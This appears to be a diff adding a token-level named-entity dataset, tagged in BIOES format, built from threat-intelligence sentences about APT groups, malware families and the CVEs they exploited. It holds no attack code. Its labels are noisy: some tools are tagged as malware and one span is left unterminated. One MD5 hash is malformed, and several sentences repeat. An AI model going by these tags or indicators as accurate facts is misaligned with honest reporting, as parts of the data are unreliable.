+again O
+with O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+( O
+CVE-2015-2590 S-VULID
+) O
+in O
+July B-TIME
+2015 E-TIME
+. O
+
+We O
+are O
+however O
+only O
+aware O
+of O
+one O
+instance O
+- O
+the O
+exploitation O
+of O
+CVE-2013-0640 S-VULID
+to O
+deploy O
+MiniDuke S-MAL
+- O
+where O
+we O
+believe O
+the O
+exploited O
+vulnerability O
+was O
+a O
+zero-day S-VULNAME
+at O
+the O
+time O
+that O
+the O
+group O
+acquired O
+the O
+exploit S-VULNAME
+. O
+
+FireEye S-SECTEAM
+confirmed O
+that O
+since O
+at O
+least O
+November B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+exploited O
+a O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash E-TOOL
+vulnerability O
+, O
+CVE-2018-4878 S-VULID
+, O
+to O
+distribute O
+DOGCALL S-MAL
+malware S-MAL
+to O
+South B-LOC
+Korean E-LOC
+victims O
+. O
+
+FireEye B-SECTEAM
+iSIGHT I-SECTEAM
+Intelligence E-SECTEAM
+confirmed O
+that O
+since O
+at O
+least O
+November B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+exploited O
+a O
+zero-day S-VULNAME
+Adobe B-TOOL
+Flash E-TOOL
+vulnerability O
+, O
+CVE-2018-4878 S-VULID
+, O
+to O
+distribute O
+DOGCALL S-MAL
+malware S-MAL
+to O
+South B-LOC
+Korean E-LOC
+victims O
+. O
+
+A O
+well-funded O
+, O
+highly O
+active O
+group O
+of O
+Middle B-LOC
+Eastern E-LOC
+hackers O
+was O
+caught O
+, O
+yet O
+again O
+, O
+using O
+a O
+lucrative O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+the O
+wild O
+to O
+break O
+into O
+computers O
+and O
+infect O
+them O
+with O
+powerful O
+spyware O
+developed O
+by O
+an O
+infamous O
+cyberweapons O
+dealer O
+named O
+Gamma B-APT
+Group E-APT
+. O
+
+A O
+well-funded O
+, O
+highly O
+active O
+BlackOasis B-APT
+group E-APT
+of O
+Middle B-LOC
+Eastern E-LOC
+hackers O
+was O
+caught O
+, O
+yet O
+again O
+, O
+using O
+a O
+lucrative O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+the O
+wild O
+to O
+break O
+into O
+computers O
+and O
+infect O
+them O
+with O
+powerful O
+spyware O
+developed O
+by O
+an O
+infamous O
+cyberweapons O
+dealer O
+named O
+Gamma B-APT
+Group E-APT
+. O
+
+Kaspersky S-SECTEAM
+found O
+the O
+BlackOasis B-APT
+group E-APT
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+Kaspersky S-SECTEAM
+found O
+the O
+group O
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+has O
+demonstrated O
+the O
+ability O
+to O
+identify O
+a O
+significant O
+zero-day S-VULNAME
+vulnerability O
+within O
+a O
+popular O
+Japanese S-LOC
+corporate O
+tool O
+and O
+then O
+use O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+indiscriminately O
+compromise O
+Japanese S-LOC
+Internet-facing O
+enterprise O
+systems O
+. O
+
+The O
+group O
+has O
+demonstrated O
+the O
+ability O
+to O
+identify O
+a O
+significant O
+zero-day S-VULNAME
+vulnerability O
+within O
+a O
+popular O
+Japanese S-LOC
+corporate O
+tool O
+and O
+then O
+use O
+scan-and-exploit B-ACT
+techniques E-ACT
+to O
+indiscriminately O
+compromise O
+Japanese S-LOC
+Internet-facing O
+enterprise O
+systems O
+. O
+
+BRONZE B-APT
+BUTLER E-APT
+has O
+used O
+phishing B-ACT
+emails S-TOOL
+with O
+Flash S-TOOL
+animation O
+attachments O
+to O
+download O
+and O
+execute O
+Daserf S-MAL
+malware S-MAL
+, O
+and O
+has O
+also O
+leveraged O
+Flash S-TOOL
+exploits S-VULNAME
+for O
+SWC B-ACT
+attacks E-ACT
+. O
+
+The O
+group O
+has O
+used O
+phishing B-ACT
+emails S-TOOL
+with O
+Flash S-TOOL
+animation O
+attachments O
+to O
+download O
+and O
+execute O
+Daserf S-MAL
+malware S-MAL
+, O
+and O
+has O
+also O
+leveraged O
+Flash S-TOOL
+exploits S-VULNAME
+for O
+SWC B-ACT
+attacks E-ACT
+. O
+
+While O
+investigating O
+a O
+2016 S-TIME
+intrusion O
+, O
+Secureworks S-SECTEAM
+identified O
+BRONZE B-APT
+BUTLER E-APT
+exploiting O
+a O
+then-unpatched O
+remote B-ACT
+code I-ACT
+execution E-ACT
+vulnerability O
+( O
+CVE-2016-7836 S-VULID
+) O
+in O
+SKYSEA O
+Client O
+View O
+, O
+a O
+popular O
+Japanese S-LOC
+product O
+used O
+to O
+manage O
+an O
+organization O
+. O
+
+While O
+investigating O
+a O
+2016 S-TIME
+intrusion O
+, O
+Secureworks S-SECTEAM
+incident O
+responders O
+identified O
+BRONZE B-APT
+BUTLER E-APT
+exploiting O
+a O
+then-unpatched O
+remote B-ACT
+code I-ACT
+execution E-ACT
+vulnerability O
+( O
+CVE-2016-7836 S-VULID
+) O
+in O
+SKYSEA O
+Client O
+View O
+, O
+a O
+popular O
+Japanese S-LOC
+product O
+used O
+to O
+manage O
+an O
+organization O
+. O
+
+Carbanak S-MAL
+is O
+a O
+remote O
+backdoor O
+( O
+initially O
+based O
+on O
+Carberp S-MAL
+) O
+, O
+designed O
+for O
+espionage S-ACT
+, O
+data O
+Exfiltration S-ACT
+and O
+to O
+provide O
+remote O
+access O
+to O
+infected O
+machines O
+. O
+
+If O
+found O
+on O
+the O
+target O
+system O
+, O
+Carbanak S-MAL
+will O
+try O
+to O
+exploit S-VULNAME
+a O
+known O
+vulnerability O
+in O
+Windows S-OS
+XP O
+, O
+Windows S-OS
+Server O
+2003 O
+, O
+Windows S-OS
+Vista O
+, O
+Windows S-OS
+Server O
+2008 O
+, O
+Windows S-OS
+7 O
+, O
+Windows S-OS
+8 O
+, O
+and O
+Windows S-OS
+Server O
+2012 O
+, O
+CVE-2013-3660 S-VULID
+, O
+for O
+local O
+privilege O
+escalation O
+. O
+
+To O
+enable O
+connections O
+to O
+the O
+infected O
+computer O
+using O
+the O
+Remote B-MAL
+Desktop I-MAL
+Protocol E-MAL
+( O
+RDP S-MAL
+) O
+, O
+Carbanak S-MAL
+sets O
+Termservice O
+service O
+execution O
+mode O
+to O
+Auto O
+. O
+
+Carbanak S-MAL
+is O
+also O
+aware O
+of O
+the O
+IFOBS O
+banking O
+application O
+and O
+can O
+, O
+on O
+command O
+, O
+substitute O
+the O
+details O
+of O
+payment O
+documents O
+in O
+the O
+IFOBS O
+system O
+. O
+
+Sensitive O
+bank O
+documents O
+have O
+be O
+found O
+on O
+the O
+servers O
+that O
+were O
+controlling O
+Carbanak S-MAL
+. O
+
+Existing O
+telemetry O
+indicates O
+that O
+the O
+Carbanak S-MAL
+attackers S-APT
+are O
+trying O
+to O
+expand O
+operations O
+to O
+other O
+Baltic S-LOC
+and O
+Central B-LOC
+Europe E-LOC
+countries O
+, O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Asia S-LOC
+and O
+Africa S-LOC
+. O
+
+We O
+believe O
+that O
+the O
+Carbanak S-MAL
+campaign O
+is O
+a O
+clear O
+indicator O
+of O
+a O
+new O
+era O
+in O
+cybercrime O
+in O
+which O
+criminals S-APT
+use O
+APT B-ACT
+techniques E-ACT
+directly O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+instead O
+of O
+through O
+its O
+customers S-IDTY
+. O
+
+This O
+report O
+describes O
+the O
+details O
+and O
+type O
+of O
+operations O
+carried O
+out O
+by O
+Carbanak S-MAL
+that O
+focuses O
+on O
+financial B-IDTY
+industry E-IDTY
+, O
+such O
+as O
+payment B-IDTY
+providers E-IDTY
+, O
+retail B-IDTY
+industry E-IDTY
+and O
+PR B-IDTY
+companies E-IDTY
+. O
+
+Carbanak S-MAL
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+From O
+2013 S-TIME
+Carbanak S-MAL
+intensified O
+its O
+activity O
+focused O
+on O
+banks S-IDTY
+and O
+electronic B-IDTY
+payment E-IDTY
+systems O
+in O
+Russia S-LOC
+and O
+in O
+the O
+post-Soviet S-LOC
+space S-IDTY
+. O
+
+Since O
+2013 S-TIME
+Carbanak S-MAL
+has O
+successfully O
+gained O
+access O
+to O
+networks O
+of O
+more O
+than O
+50 O
+banks S-IDTY
+and O
+5 O
+payment B-IDTY
+systems E-IDTY
+. O
+
+To O
+reduce O
+the O
+risk O
+of O
+losing O
+access O
+to O
+the O
+internal O
+bank O
+network O
+, O
+the O
+Carbanak S-MAL
+, O
+in O
+addition O
+to O
+malicious O
+programs O
+, O
+also O
+used O
+for O
+remote O
+access O
+legitimate O
+programs O
+such O
+as O
+Ammy B-MAL
+Admin E-MAL
+and O
+Team B-MAL
+Viewer E-MAL
+. O
+
+Additionally O
+the O
+reports O
+on O
+Carbanak S-MAL
+show O
+a O
+different O
+picture O
+, O
+where O
+banks S-IDTY
+targeted O
+outside O
+of O
+Russia S-LOC
+, O
+specifically O
+Europe S-LOC
+, O
+USA S-LOC
+and O
+Japan S-LOC
+are O
+mentioned O
+, O
+which O
+does O
+not O
+match O
+our O
+research O
+. O
+
+These O
+attacks O
+have O
+included O
+criminal B-APT
+groups E-APT
+responsible O
+for O
+the O
+delivery O
+of O
+NewPosThings O
+, O
+MalumPOS O
+and O
+PoSeidon S-APT
+point O
+of O
+sale O
+Malware O
+, O
+as O
+well O
+as O
+Carbanak S-MAL
+from O
+the O
+Russian S-LOC
+criminal B-APT
+organization E-APT
+we O
+track O
+as O
+Carbon B-APT
+Spider E-APT
+. O
+
+The O
+leader O
+of O
+the O
+crime B-APT
+gang E-APT
+behind O
+the O
+Carbanak S-MAL
+and O
+Cobalt B-ACT
+malware I-ACT
+attacks E-ACT
+targeting O
+over O
+a O
+100 O
+financial B-IDTY
+institutions E-IDTY
+worldwide O
+has O
+been O
+arrested O
+in O
+Alicante O
+, O
+Spain S-LOC
+, O
+after O
+a O
+complex O
+investigation O
+conducted O
+by O
+the O
+Spanish O
+National O
+Police O
+. O
+
+Since O
+2013 S-TIME
+, O
+the O
+cybercrime B-APT
+gang E-APT
+have O
+attempted O
+to O
+attack O
+banks S-IDTY
+, O
+e-payment S-IDTY
+systems O
+and O
+financial B-IDTY
+institutions E-IDTY
+using O
+pieces O
+of O
+malware O
+they O
+designed O
+, O
+known O
+as O
+Carbanak S-MAL
+and O
+Cobalt S-MAL
+. O
+
+Other O
+public O
+tools O
+used O
+by O
+the O
+CopyKittens S-APT
+are O
+Metasploit S-MAL
+, O
+a O
+well-known O
+free O
+and O
+open O
+source O
+framework O
+for O
+developing O
+and O
+executing O
+exploit S-VULNAME
+code O
+against O
+a O
+remote O
+target O
+machine O
+; O
+Mimikatz S-MAL
+, O
+a O
+post-exploitation O
+tool O
+that O
+performs O
+credential O
+dumping O
+; O
+and O
+Empire S-MAL
+, O
+a O
+PowerShell S-MAL
+and O
+Python S-TOOL
+post-exploitation O
+agent O
+. O
+
+Just O
+a O
+few O
+months O
+later O
+, O
+in O
+February B-TIME
+2015 E-TIME
+, O
+we O
+announced O
+the O
+discovery O
+of O
+Carbanak S-MAL
+, O
+a O
+cyber-criminal B-APT
+gang E-APT
+that O
+used O
+custom O
+malware O
+and O
+APT B-ACT
+techniques E-ACT
+to O
+steal O
+millions O
+of O
+dollars O
+while O
+infecting O
+hundreds O
+of O
+financial B-IDTY
+institutions E-IDTY
+in O
+at O
+least O
+30 O
+countries O
+. O
+
+However O
+, O
+in O
+September S-TIME
+last O
+year O
+, O
+our O
+friends O
+at O
+CSIS S-SECTEAM
+published O
+a O
+blog O
+detailing O
+a O
+new O
+Carbanak S-MAL
+variant O
+affecting O
+one O
+of O
+its O
+customers S-IDTY
+. O
+
+In O
+one O
+remarkable O
+case O
+, O
+the O
+Carbanak S-MAL
+2.0 O
+gang O
+used O
+its O
+access O
+to O
+a O
+financial B-IDTY
+institution E-IDTY
+that O
+stores O
+information O
+about O
+shareholders O
+to O
+change O
+the O
+ownership O
+details O
+of O
+a O
+large O
+company O
+. O
+
+This O
+Gorgon B-ACT
+Group I-ACT
+campaign E-ACT
+leveraged O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+Microsoft B-FILE
+Word I-FILE
+documents E-FILE
+exploiting O
+CVE-2017-0199 S-VULID
+. O
+
+Ke3chang S-APT
+has O
+also O
+leveraged O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2012-4681 S-VULID
+) O
+, O
+as O
+well O
+as O
+older O
+, O
+reliable O
+exploits O
+for O
+Microsoft B-FILE
+Word E-FILE
+( O
+CVE-2010-3333 S-VULID
+) O
+and O
+Adobe B-MAL
+PDF I-MAL
+Reader E-MAL
+( O
+CVE-2010-2883 S-VULID
+) O
+. O
+
+While O
+the O
+URL O
+acts O
+similarly O
+to O
+how O
+eye-watch.in O
+: O
+443 O
+delivers O
+payloads O
+, O
+we O
+also O
+saw O
+the O
+URL O
+leveraging O
+and O
+exploiting O
+security O
+flaws O
+in O
+Flash S-TOOL
+: O
+CVE-2015-8651 S-VULID
+, O
+CVE-2016-1019 S-VULID
+, O
+and O
+CVE-2016-4117 S-VULID
+. O
+
+The O
+exploit S-VULNAME
+, O
+which O
+takes O
+advantage O
+of O
+CVE-2018-4878 S-VULID
+, O
+allows O
+an O
+attacker S-APT
+to O
+execute O
+arbitrary O
+code O
+such O
+as O
+an O
+implant O
+. O
+
+Documents S-FILE
+with O
+the O
+flash S-TOOL
+exploit S-VULNAME
+managed O
+to O
+evade O
+static O
+defenses O
+and O
+remain O
+undetected O
+as O
+an O
+exploit S-VULNAME
+on O
+VirusTotal S-TOOL
+. O
+
+WannaCry S-MAL
+utilizes O
+EternalBlue S-VULNAME
+by O
+crafting O
+a O
+custom O
+SMB S-MAL
+session O
+request O
+with O
+hard-coded O
+values O
+based O
+on O
+the O
+target O
+system O
+. O
+
+WannaCry S-MAL
+leverages O
+an O
+exploit S-VULNAME
+, O
+codenamed O
+" O
+EternalBlue S-VULNAME
+" O
+, O
+that O
+was O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+on O
+April B-TIME
+14 I-TIME
+, I-TIME
+2017 E-TIME
+. O
+
+Microsoft S-IDTY
+addressed O
+the O
+SMBv1 S-TOOL
+vulnerabilities S-VULNAME
+in O
+March B-TIME
+2017 E-TIME
+with O
+Security O
+Bulletin O
+MS17-010 O
+. O
+
+The O
+worm O
+leverages O
+an O
+SMBv1 B-TOOL
+exploit S-VULNAME
+that O
+originates O
+from O
+tools O
+released O
+by O
+the O
+Shadow B-APT
+Brokers E-APT
+threat O
+group O
+in O
+April S-TIME
+. O
+
+If O
+the O
+DoublePulsar B-MAL
+backdoor E-MAL
+does O
+not O
+exist O
+, O
+then O
+the O
+SMB B-MAL
+worm E-MAL
+attempts O
+to O
+compromise O
+the O
+target O
+using O
+the O
+Eternalblue S-VULNAME
+SMBv1 S-TOOL
+exploit S-VULNAME
+. O
+
+Leafminer S-APT
+has O
+developed O
+exploit S-VULNAME
+payloads O
+for O
+this O
+framework O
+( O
+Table O
+2 O
+) O
+that O
+deliver O
+custom O
+malware O
+through O
+attacks O
+against O
+SMB S-TOOL
+vulnerabilities S-VULNAME
+described O
+by O
+Microsoft S-IDTY
+. O
+
+The O
+EternalBlue S-VULNAME
+exploits S-VULNAME
+from O
+the O
+framework O
+received O
+worldwide O
+attention O
+after O
+being O
+used O
+in O
+the O
+ransomware B-ACT
+campaigns I-ACT
+WannaCry E-ACT
+in O
+May S-TIME
+and O
+Petya S-MAL
+/ O
+NotPetya S-MAL
+in O
+June B-TIME
+2017 E-TIME
+. O
+
+The O
+Leafminer S-APT
+operators S-APT
+use O
+EternalBlue S-VULNAME
+to O
+attempt O
+lateral O
+movement O
+within O
+target O
+networks O
+from O
+compromised O
+staging O
+servers O
+. O
+
+Symantec S-SECTEAM
+also O
+observed O
+attempts O
+by O
+Leafminer S-APT
+to O
+scan O
+for O
+the O
+Heartbleed B-VULNAME
+vulnerability E-VULNAME
+( O
+CVE-2014-0160 S-VULID
+) O
+from O
+an O
+attacker-controlled O
+IP S-PROT
+address O
+. O
+
+The O
+attachments O
+exploited O
+CVE-2017-8759 S-VULID
+which O
+was O
+discovered O
+and O
+documented O
+only O
+five O
+days O
+prior O
+to O
+the O
+campaign O
+. O
+
+Some O
+of O
+the O
+documents S-FILE
+exploited O
+CVE-2017-0199 S-VULID
+to O
+deliver O
+the O
+payload O
+. O
+
+The O
+group O
+'s O
+capabilities O
+are O
+more O
+than O
+the O
+much O
+discussed O
+CVE-2012-0158 S-VULID
+exploits O
+over O
+the O
+past O
+few O
+years O
+. O
+
+Instead O
+, O
+the O
+Spring B-APT
+Dragon I-APT
+group E-APT
+is O
+known O
+to O
+have O
+employed O
+spearphish S-ACT
+exploits S-VULNAME
+, O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+, O
+and O
+watering B-ACT
+holes I-ACT
+attack E-ACT
+. O
+
+The O
+group O
+'s O
+spearphish O
+toolset O
+includes O
+PDF S-TOOL
+exploits S-VULNAME
+, O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+exploits S-VULNAME
+, O
+and O
+the O
+common O
+CVE-2012-0158 S-VULID
+Word S-TOOL
+exploits S-VULNAME
+including O
+those O
+generated O
+from O
+the O
+infamous O
+" O
+Tran B-MAL
+Duy I-MAL
+Linh E-MAL
+" O
+kit O
+. O
+
+While O
+this O
+particular O
+actor S-APT
+effectively O
+used O
+their O
+almost O
+worn O
+out O
+CVE-2012-0158 S-VULID
+exploits O
+in O
+the O
+past O
+, O
+Spring B-APT
+Dragon E-APT
+employs O
+more O
+involved O
+and O
+creative O
+intrusive O
+activity O
+as O
+well O
+. O
+
+To O
+mitigate O
+the O
+threat O
+of O
+the O
+described O
+campaign O
+, O
+security O
+teams O
+can O
+consider O
+blocking O
+access O
+to O
+the O
+C2 S-TOOL
+server O
+103.236.150.14 O
+and O
+, O
+where O
+applicable O
+, O
+ensure O
+that O
+the O
+Microsoft S-IDTY
+Security O
+Update O
+KB2553204 O
+is O
+installed O
+in O
+order O
+to O
+patch O
+the O
+CVE-2017-11882 S-VULID
+vulnerability O
+. O
+
+The O
+actors S-APT
+attempted O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+using O
+a O
+slightly O
+modified O
+version O
+of O
+the O
+proof-of-concept O
+( O
+POC O
+) O
+code O
+to O
+install O
+a O
+Trojan S-MAL
+called O
+Emissary S-MAL
+, O
+which O
+is O
+related O
+to O
+the O
+Operation B-ACT
+Lotus I-ACT
+Blossom I-ACT
+campaign E-ACT
+. O
+
+Both O
+attachments O
+are O
+malicious B-FILE
+Word I-FILE
+documents E-FILE
+that O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+OLE B-TOOL
+Automation I-TOOL
+Array I-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution E-TOOL
+Vulnerability S-VULNAME
+tracked O
+by O
+CVE-2014-6332 S-VULID
+. O
+
+Lotus B-APT
+Blossom E-APT
+attempted O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+using O
+the O
+POC O
+code O
+available O
+in O
+the O
+wild O
+. O
+
+Lotus B-APT
+Blossom E-APT
+was O
+attempting O
+to O
+exploit S-VULNAME
+CVE-2014-6332 S-VULID
+to O
+install O
+a O
+new O
+version O
+of O
+the O
+Emissary B-MAL
+Trojan E-MAL
+, O
+specifically O
+version O
+5.3 O
+. O
+
+POWRUNER S-MAL
+was O
+delivered O
+using O
+a O
+malicious O
+RTF B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+APT34 S-APT
+leveraged O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+. O
+
+PIVY S-MAL
+also O
+played O
+a O
+key O
+role O
+in O
+the O
+2011 B-ACT
+campaign E-ACT
+known O
+as O
+Nitro O
+that O
+targeted O
+chemical B-IDTY
+makers E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+and O
+human O
+rights O
+groups.10,11 O
+Still O
+active O
+a O
+year O
+later O
+, O
+the O
+Nitro O
+attackers S-APT
+used O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Java O
+to O
+deploy O
+PIVY S-MAL
+in O
+2012 S-TIME
+. O
+
+Just O
+recently O
+, O
+PIVY S-MAL
+was O
+the O
+payload O
+of O
+a O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+Internet O
+Explorer O
+used O
+in O
+what O
+is O
+known O
+as O
+a O
+" O
+strategic B-ACT
+web I-ACT
+compromise E-ACT
+" O
+attack O
+against O
+visitors O
+to O
+a O
+U.S. S-LOC
+government O
+website O
+and O
+a O
+variety O
+of O
+others O
+. O
+
+It O
+came O
+in O
+the O
+form O
+of O
+a O
+" O
+Tran B-MAL
+Duy I-MAL
+Linh E-MAL
+" O
+CVE-2012-0158 S-VULID
+exploit S-VULNAME
+kit O
+document O
+MD5 S-ENCR
+: O
+de8a242af3794a8be921df0cfa51885f61 O
+and O
+was O
+observed O
+on O
+April B-TIME
+10 I-TIME
+, I-TIME
+2014 E-TIME
+. O
+
+This O
+bait B-FILE
+document E-FILE
+, O
+or O
+email B-ACT
+attachment E-ACT
+, O
+appears O
+to O
+be O
+a O
+standard O
+Word S-TOOL
+document O
+, O
+but O
+is O
+in O
+fact O
+an O
+CVE-2012-0158 S-VULID
+exploit S-VULNAME
+, O
+an O
+executable O
+with O
+a O
+double O
+extension O
+, O
+or O
+an O
+executable O
+with O
+an O
+RTLO O
+filename O
+, O
+so O
+it O
+can O
+execute O
+code O
+without O
+the O
+user O
+'s O
+knowledge O
+or O
+consent O
+. O
+
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+both O
+used O
+an O
+exploit S-VULNAME
+for O
+CVE-2016-4117 S-VULID
+, O
+a O
+vulnerability O
+in O
+Adobe O
+Flash S-TOOL
+Player O
+that O
+, O
+at O
+the O
+time O
+, O
+was O
+both O
+unknown O
+and O
+unpatched O
+. O
+
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+both O
+used O
+a O
+zero-day S-VULNAME
+exploit S-VULNAME
+that O
+executed O
+code O
+to O
+download O
+a O
+malicious O
+payload O
+. O
+
+NEODYMIUM S-APT
+also O
+used O
+the O
+exact O
+same O
+CVE-2016-4117 S-VULID
+exploit S-VULNAME
+code O
+that O
+PROMETHIUM S-APT
+used O
+, O
+prior O
+to O
+public O
+knowledge O
+of O
+the O
+vulnerability O
+'s O
+existence O
+. O
+
+In O
+May B-TIME
+2016 E-TIME
+, O
+two O
+apparently O
+unrelated O
+activity B-APT
+groups E-APT
+, O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+, O
+conducted O
+attack B-ACT
+campaigns E-ACT
+in O
+Europe S-LOC
+that O
+used O
+the O
+same O
+zeroday S-VULNAME
+exploit S-VULNAME
+while O
+the O
+vulnerability O
+was O
+publicly O
+unknown O
+. O
+
+The O
+Middle B-LOC
+Eastern E-LOC
+hacker O
+group O
+in O
+this O
+case O
+is O
+codenamed O
+" O
+BlackOasis S-APT
+" O
+Kaspersky S-SECTEAM
+found O
+the O
+group O
+was O
+exploiting O
+a O
+Adobe B-TOOL
+Flash I-TOOL
+Player E-TOOL
+zero-day S-VULNAME
+vulnerability O
+( O
+CVE-2016-4117 S-VULID
+) O
+to O
+remotely O
+deliver O
+the O
+latest O
+version O
+of O
+" O
+FinSpy S-MAL
+" O
+malware O
+, O
+according O
+to O
+a O
+new O
+blog O
+post O
+published O
+Monday O
+. O
+
+The O
+discovery O
+by O
+Kaspersky S-SECTEAM
+marks O
+at O
+least O
+the O
+fifth O
+zero-day S-VULNAME
+exploit S-VULNAME
+used O
+by O
+BlackOasis S-APT
+and O
+exposed O
+by O
+security O
+researchers O
+since O
+June B-TIME
+2015 E-TIME
+. O
+
+Less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+for O
+CVE-2017-11882 S-VULID
+on O
+Nov. B-TIME
+14 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+FireEye S-SECTEAM
+observed O
+an O
+attacker S-APT
+using O
+an O
+exploit S-VULNAME
+for O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+to O
+target O
+a O
+government B-IDTY
+organization E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+The O
+backdoor O
+was O
+delivered O
+via O
+a O
+malicious O
+.rtf B-FILE
+file E-FILE
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+In O
+this O
+latest O
+campaign O
+, O
+APT34 S-APT
+leveraged O
+the O
+recent O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+. O
+
+During O
+the O
+past O
+few O
+months O
+, O
+APT34 S-APT
+has O
+been O
+able O
+to O
+quickly O
+incorporate O
+exploits O
+for O
+at O
+least O
+two O
+publicly O
+vulnerabilities O
+( O
+CVE-2017-0199 S-VULID
+and O
+CVE-2017-11882 S-VULID
+) O
+to O
+target O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+November B-TIME
+2017 E-TIME
+, O
+APT34 S-APT
+leveraged O
+the O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+CVE-2017-11882 S-VULID
+to O
+deploy O
+POWRUNER S-MAL
+and O
+BONDUPDATER S-MAL
+less O
+than O
+a O
+week O
+after O
+Microsoft S-IDTY
+issued O
+a O
+patch O
+. O
+
+POWRUNER S-MAL
+was O
+delivered O
+using O
+a O
+malicious B-MAL
+RTF E-MAL
+file O
+that O
+exploited O
+CVE-2017-0199 S-VULID
+. O
+
+Specifically O
+, O
+Suckfly O
+used O
+a O
+specially O
+crafted O
+web O
+page O
+to O
+deliver O
+an O
+exploit S-VULNAME
+for O
+the O
+Microsoft S-IDTY
+Windows S-OS
+OLE B-TOOL
+Remote I-TOOL
+Code I-TOOL
+Execution E-TOOL
+Vulnerability S-VULNAME
+( O
+CVE-2014-6332 S-VULID
+) O
+, O
+which O
+affects O
+specific O
+versions O
+of O
+Microsoft S-IDTY
+Windows S-OS
+. O
+
+This O
+time O
+, O
+however O
+, O
+TA459 O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+This O
+time O
+, O
+however O
+, O
+attackers O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+Data O
+from O
+the O
+early O
+part O
+of O
+this O
+year O
+shows O
+that O
+the O
+Taidoor O
+attackers O
+rampantly O
+used O
+malicious.DOC S-FILE
+files O
+to O
+exploit S-VULNAME
+a O
+Microsoft S-IDTY
+Common B-TOOL
+Controls E-TOOL
+vulnerability S-VULNAME
+, O
+CVE-2012-0158 S-VULID
+. O
+
+TG-3390 S-APT
+uses O
+older O
+exploits O
+to O
+compromise O
+targets O
+, O
+and O
+CTU S-SECTEAM
+researchers O
+have O
+not O
+observed O
+the O
+threat O
+actors O
+using O
+zero-day S-VULNAME
+exploits O
+as O
+of O
+this O
+publication O
+. O
+
+TG-3390 S-APT
+actors O
+have O
+used O
+Java S-TOOL
+exploits O
+in O
+their O
+SWCs S-MAL
+. O
+
+In O
+particular O
+, O
+TG-3390 S-APT
+has O
+exploited O
+CVE-2011-3544 S-VULID
+, O
+a O
+vulnerability O
+in O
+the O
+Java O
+Runtime O
+Environment O
+, O
+to O
+deliver O
+the O
+HTTPBrowser B-MAL
+backdoor E-MAL
